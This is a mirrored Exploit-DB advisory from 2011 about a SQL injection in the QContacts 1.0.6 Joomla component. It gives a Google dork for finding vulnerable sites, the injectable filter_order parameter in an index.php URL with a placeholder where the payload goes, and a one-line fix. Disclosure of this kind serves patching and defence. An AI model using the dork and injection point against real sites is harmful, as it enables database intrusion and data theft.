Joomla! Component com_qcontacts 1.0.6 – SQL Injection

Exploit Database
37 阅读

作者： Don

日期： 2011-12-08
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/18218/

############################################################################
# Exploit Title: *QContacts 1.0.6 (Joomla component) SQL injection*
# Google Dork: inurl:"/components/com_qcontacts/"
# Date: Decembar/08/2011
# Author: Don (BalcanCrew & BalcanHack)
# Software Link: *
http://www.latenight-coding.com/joomla-addons/qcontacts.html*
# Version: 1.0.6
# Tested on: Apache
############################################################################

Vulnerability:
This vulnerability affects /index.php

*
/index.php?option=com_qcontacts?=catid=0&filter_order=[SQLi]&filter_order_Dir=&option=com_qcontacts
*


How to fix this vulnerability:
*Filter metacharacters from user input.*

*~Don 2011*

last Exploits
Joomla! Component com_qcontacts 1.0.6 – SQL Injection的更多信息

PHPMyRealty 1.0.7 – SQL Injection：
EyesOfNetwork 5.3 – RCE & PrivEsc：
Simple Shopping Cart Application 0.1 – SQL Injection：
Maian Support Helpdesk 4.3 – Cross-Site Request Forgery (Add Admin)：
Integria IMS 5.0.83 – Cross-Site Request Forgery：
osCommerce Visitor Web Stats AddOn – ‘Accept-Language’ Header SQL Injection：
Geutebrueck re_porter 16 – Cross-Site Scripting：
ConPresso 4.0.7 – SQL Injection：